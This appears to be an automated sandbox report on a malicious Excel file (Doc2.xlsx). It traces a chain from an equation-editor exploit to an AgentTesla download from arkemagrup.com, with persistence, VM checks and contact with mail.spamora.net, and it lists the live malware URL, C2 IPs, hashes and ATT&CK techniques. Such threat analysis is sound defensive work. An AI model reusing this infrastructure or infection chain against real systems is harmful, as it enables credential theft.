                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion131Cached Domain CredentialsVirtualization/Sandbox Evasion131VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 452692 Sample: Doc2.xlsx Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 55 Found malware configuration 2->55 57 Antivirus detection for URL or domain 2->57 59 Multi AV Scanner detection for dropped file 2->59 61 14 other signatures 2->61 7 EQNEDT32.EXE 12 2->7         started        12 MLdAu.exe 2 2->12         started        14 MLdAu.exe 2 2->14         started        16 EXCEL.EXE 34 36 2->16         started        process3 dnsIp4 49 arkemagrup.com 185.26.106.165, 49165, 80 ATE-ASFR France 7->49 41 C:\Users\user\...\Doc_87654334567[1].exe, PE32 7->41 dropped 43 C:\Users\Public\vbc.exe, PE32 7->43 dropped 71 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->71 18 vbc.exe 3 7->18         started        73 Multi AV Scanner detection for dropped file 12->73 75 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 12->75 77 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 12->77 22 schtasks.exe 12->22         started        24 MLdAu.exe 12->24         started        79 Injects a PE file into a foreign processes 14->79 26 schtasks.exe 14->26         started        28 MLdAu.exe 14->28         started        45 C:\Users\user\Desktop\~$Doc2.xlsx, data 16->45 dropped file5 signatures6 process7 file8 37 C:\Users\user\AppData\...\WzyRXCWtdGSdEA.exe, PE32 18->37 dropped 39 C:\Users\user\AppData\Local\...\tmpB2BC.tmp, XML 18->39 dropped 63 Multi AV Scanner detection for dropped file 18->63 65 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 18->65 67 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 18->67 69 2 other signatures 18->69 30 vbc.exe 1 6 18->30         started        35 schtasks.exe 18->35         started        signatures9 process10 dnsIp11 51 mail.spamora.net 185.26.106.194, 49166, 49167, 49169 ATE-ASFR France 30->51 47 C:\Users\user\AppData\Roaming\...\MLdAu.exe, PE32 30->47 dropped 53 Hides that the sample has been downloaded from the Internet (zone.identifier) 30->53 file12 signatures13

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Doc2.xlsx28%ReversingLabsDocument-OLE.Exploit.CVE-2018-0802

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Doc_87654334567[1].exe13%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe13%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      C:\Users\user\AppData\Roaming\WzyRXCWtdGSdEA.exe13%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      C:\Users\Public\vbc.exe13%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      18.2.MLdAu.exe.400000.0.unpack100%AviraHEUR/AGEN.1138205Download File
                      17.2.MLdAu.exe.400000.0.unpack100%AviraHEUR/AGEN.1138205Download File
                      9.2.vbc.exe.400000.1.unpack100%AviraHEUR/AGEN.1138205Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://arkemagrup.com/Doc_87654334567.exe100%Avira URL Cloudmalware
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://ocsp.sectigo.com0%0%Avira URL Cloudsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      http://mail.spamora.net0%Avira URL Cloudsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://BGwprh.com0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://servername/isapibackend.dll0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mail.spamora.net
                      185.26.106.194
                      truetrue
                        unknown
                        arkemagrup.com
                        185.26.106.165
                        truetrue
                          unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://arkemagrup.com/Doc_87654334567.exetrue
                          • Avira URL Cloud: malware
                          unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://127.0.0.1:HTTP/1.1vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://DynDns.comDynDNSvbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://sectigo.com/CPS0vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://crl.entrust.net/server1.crl0vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpfalse
                            high
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%havbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://ocsp.entrust.net03vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0vbc.exe, 00000009.00000002.2370250103.000000000093D000.00000004.00000020.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.diginotar.nl/cps/pkioverheid0vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            https://login.blockchain.com/ObjectLengthChainingModeGCMAuthTagLengthChainingModeKeyDataBlobAESMicrovbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmpfalse
                              high
                              http://ocsp.sectigo.com0%vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              low
                              http://crl.pkioverheid.nl/DomOvLatestCRL.crl0vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000006.00000002.2235845813.000000000B8F0000.00000002.00000001.sdmp, vbc.exe, 00000009.00000002.2375831529.0000000005CD0000.00000002.00000001.sdmpfalse
                                high
                                https://login.blockchain.com/HD?mvbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmpfalse
                                  high
                                  https://api.ipify.org%GETMozilla/5.0vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  low
                                  http://mail.spamora.netvbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.%s.comPAvbc.exe, 00000006.00000002.2235845813.000000000B8F0000.00000002.00000001.sdmp, vbc.exe, 00000009.00000002.2375831529.0000000005CD0000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  low
                                  http://ocsp.entrust.net0Dvbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://BGwprh.comvbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000006.00000002.2229803981.0000000002311000.00000004.00000001.sdmp, MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmpfalse
                                    high
                                    https://secure.comodo.com/CPS0vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpfalse
                                      high
                                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipvbc.exe, 00000006.00000002.2230917923.00000000034B9000.00000004.00000001.sdmp, vbc.exe, 00000009.00000002.2369735651.0000000000402000.00000040.00000001.sdmp, MLdAu.exe, 0000000B.00000002.2342137023.0000000002FF1000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://servername/isapibackend.dllvbc.exe, 00000009.00000002.2382948268.0000000008610000.00000002.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      low
                                      http://crl.entrust.net/2048ca.crl0vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpfalse
                                        high

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        185.26.106.194
                                        mail.spamora.netFrance
                                        24935ATE-ASFRtrue
                                        185.26.106.165
                                        arkemagrup.comFrance
                                        24935ATE-ASFRtrue

                                        General Information

                                        Joe Sandbox Version:33.0.0 White Diamond
                                        Analysis ID:452692
                                        Start date:22.07.2021
                                        Start time:18:11:08
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 13m 5s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Sample file name:Doc2.xlsx
                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                        Number of analysed new started processes analysed:17
                                        Number of new started drivers analysed:2
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.expl.evad.winXLSX@18/28@7/2
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 0.2% (good quality ratio 0%)
                                        • Quality average: 0%
                                        • Quality standard deviation: 0%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .xlsx
                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                        • Attach to Office via COM
                                        • Scroll down
                                        • Close Viewer
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, conhost.exe, WmiPrvSE.exe
                                        • TCP Packets have been reduced to 100
                                        • Excluded IPs from analysis (whitelisted): 93.184.221.240, 13.107.4.50
                                        • Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, Edge-Prod-FRA.env.au.au-msedge.net, wu.azureedge.net, afdap.au.au-msedge.net, au.au-msedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, au.c-0001.c-msedge.net, elasticShed.au.au-msedge.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtCreateFile calls found.
                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        18:12:08API Interceptor52x Sleep call for process: EQNEDT32.EXE modified
                                        18:12:10API Interceptor967x Sleep call for process: vbc.exe modified
                                        18:12:45API Interceptor4x Sleep call for process: schtasks.exe modified
                                        18:13:05AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MLdAu C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe
                                        18:13:13AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MLdAu C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe
                                        18:13:14API Interceptor529x Sleep call for process: MLdAu.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        185.26.106.194Doc_347343.xlsxGet hashmaliciousBrowse
                                          5nXX3v5zWn.exeGet hashmaliciousBrowse
                                            Doc_386384934.xlsxGet hashmaliciousBrowse
                                              Doc_38464835648343.xlsxGet hashmaliciousBrowse
                                                pfI78aQqmv.exeGet hashmaliciousBrowse
                                                  Inquiry.xlsxGet hashmaliciousBrowse
                                                    Doc_87654334567.exeGet hashmaliciousBrowse
                                                      PO-4600017931.xlsxGet hashmaliciousBrowse
                                                        HTOj2DnVlw.exeGet hashmaliciousBrowse
                                                          i7Qs22QuKz.exeGet hashmaliciousBrowse
                                                            Doc.xlsxGet hashmaliciousBrowse
                                                              Doc_3956385638364836437638364738365483647383648373638463836483648363846383.exeGet hashmaliciousBrowse
                                                                Doc_987945678.exeGet hashmaliciousBrowse
                                                                  Ref-2021-05-14.exeGet hashmaliciousBrowse
                                                                    Doc_38464856384683648364.exeGet hashmaliciousBrowse
                                                                      Document_printout_copy_34853936483648364393743836384.exeGet hashmaliciousBrowse
                                                                        DHL_SHIPMENT_ADDRESS_4495749574946596484658458458,pdf.exeGet hashmaliciousBrowse
                                                                          RFQ_38463846393646388368364834.exeGet hashmaliciousBrowse
                                                                            Doc_3847468364836483638463,pdf.exeGet hashmaliciousBrowse
                                                                              9385839583309483484303843094034.exeGet hashmaliciousBrowse
                                                                                185.26.106.165Doc_347343.xlsxGet hashmaliciousBrowse
                                                                                • arkemagrup.com/Doc_87654334567.exe
                                                                                Doc_386384934.xlsxGet hashmaliciousBrowse
                                                                                • arkemagrup.com/Doc_87654334567.exe
                                                                                Doc_38464835648343.xlsxGet hashmaliciousBrowse
                                                                                • arkemagrup.com/Doc_87654334567.exe
                                                                                Inquiry.xlsxGet hashmaliciousBrowse
                                                                                • arkemagrup.com/Doc_87654334567.exe
                                                                                PO-4600017931.xlsxGet hashmaliciousBrowse
                                                                                • arkemagrup.com/Doc_87654334567.exe
                                                                                Doc.xlsxGet hashmaliciousBrowse
                                                                                • arkemagrup.com/Doc_87654334567.exe
                                                                                DOCUMENT_395849584954.exeGet hashmaliciousBrowse
                                                                                • tradingworldchina.com/Host_00.exe
                                                                                Order_364537463746347485945454.xlsxGet hashmaliciousBrowse
                                                                                • medicelcoolers.cn/file2.exe
                                                                                Specification.xlsxGet hashmaliciousBrowse
                                                                                • medicelcoolers.cn/file2.exe
                                                                                Doc_37584567499454.xlsxGet hashmaliciousBrowse
                                                                                • medicelcoolers.cn/file2.exe
                                                                                Documents.xlsxGet hashmaliciousBrowse
                                                                                • medicelcoolers.cn/file2.exe
                                                                                Documents.xlsxGet hashmaliciousBrowse
                                                                                • medicelcoolers.cn/file2.exe
                                                                                PO0495858558585_JAN2021.xlsxGet hashmaliciousBrowse
                                                                                • tradingworldchina.com/file1.exe
                                                                                Order_00009.xlsxGet hashmaliciousBrowse
                                                                                • medicelcoolers.cn/file2.exe
                                                                                PO85937758859777.xlsxGet hashmaliciousBrowse
                                                                                • tradingworldchina.com/file1.exe
                                                                                Order_385647584.xlsxGet hashmaliciousBrowse
                                                                                • medicelcoolers.cn/file2.exe
                                                                                Order_385647584.xlsxGet hashmaliciousBrowse
                                                                                • medicelcoolers.cn/file2.exe
                                                                                PO890299700006.xlsxGet hashmaliciousBrowse
                                                                                • tradingworldchina.com/file1.exe
                                                                                Doc_74657456348374.xlsxGet hashmaliciousBrowse
                                                                                • medicelcoolers.cn/file2.exe
                                                                                PO 24000109490.xlsxGet hashmaliciousBrowse
                                                                                • tradingworldchina.com/file1.exe

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                mail.spamora.netDoc_347343.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                8WJ8enHgoR.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                5nXX3v5zWn.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc_386384934.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc_38464835648343.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                pfI78aQqmv.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Inquiry.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc_87654334567.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                PO-4600017931.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                HTOj2DnVlw.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                i7Qs22QuKz.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc_3956385638364836437638364738365483647383648373638463836483648363846383.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc_987945678.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Ref-2021-05-14.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc_38464856384683648364.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Document_printout_copy_34853936483648364393743836384.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                DHL_SHIPMENT_ADDRESS_4495749574946596484658458458,pdf.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                RFQ_38463846393646388368364834.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc_3847468364836483638463,pdf.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                arkemagrup.comDoc_347343.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                Doc_386384934.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                Doc_38464835648343.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                Inquiry.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                PO-4600017931.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                Doc.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165

                                                                                ASN

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                ATE-ASFRDoc_347343.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                5nXX3v5zWn.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc_386384934.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                Doc_38464835648343.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                pfI78aQqmv.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Inquiry.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                Doc_87654334567.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                PO-4600017931.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                HTOj2DnVlw.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                i7Qs22QuKz.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                Doc_3956385638364836437638364738365483647383648373638463836483648363846383.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc_987945678.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Ref-2021-05-14.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc_38464856384683648364.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Document_printout_copy_34853936483648364393743836384.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                DHL_SHIPMENT_ADDRESS_4495749574946596484658458458,pdf.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                DOCUMENT_395849584954.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                RFQ_38463846393646388368364834.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc_3847468364836483638463,pdf.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                ATE-ASFRDoc_347343.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                5nXX3v5zWn.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc_386384934.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                Doc_38464835648343.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                pfI78aQqmv.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Inquiry.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                Doc_87654334567.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                PO-4600017931.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                HTOj2DnVlw.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                i7Qs22QuKz.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                Doc_3956385638364836437638364738365483647383648373638463836483648363846383.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc_987945678.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Ref-2021-05-14.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc_38464856384683648364.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Document_printout_copy_34853936483648364393743836384.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                DHL_SHIPMENT_ADDRESS_4495749574946596484658458458,pdf.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                DOCUMENT_395849584954.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                RFQ_38463846393646388368364834.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc_3847468364836483638463,pdf.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194

                                                                                JA3 Fingerprints

                                                                                No context

                                                                                Dropped Files

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exekwFDCU89PZ.exeGet hashmaliciousBrowse
                                                                                  C:\Users\user\AppData\Roaming\WzyRXCWtdGSdEA.exekwFDCU89PZ.exeGet hashmaliciousBrowse
                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Doc_87654334567[1].exekwFDCU89PZ.exeGet hashmaliciousBrowse

                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                      Process:C:\Users\Public\vbc.exe
                                                                                      File Type:Microsoft Cabinet archive data, 61020 bytes, 1 file
                                                                                      Category:dropped
                                                                                      Size (bytes):61020
                                                                                      Entropy (8bit):7.994886945086499
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:IZ/FdeYPeFusuQszEfL0/NfXfdl5lNQbGxO4EBJE:0tdeYPiuWAVtlLBGm
                                                                                      MD5:2902DE11E30DCC620B184E3BB0F0C1CB
                                                                                      SHA1:5D11D14A2558801A2688DC2D6DFAD39AC294F222
                                                                                      SHA-256:E6A7F1F8810E46A736E80EE5AC6187690F28F4D5D35D130D410E20084B2C1544
                                                                                      SHA-512:EFD415CDE25B827AC2A7CA4D6486CE3A43CDCC1C31D3A94FD7944681AA3E83A4966625BF2E6770581C4B59D05E35FF9318D9ADADDADE9070F131076892AF2FA0
                                                                                      Malicious:false
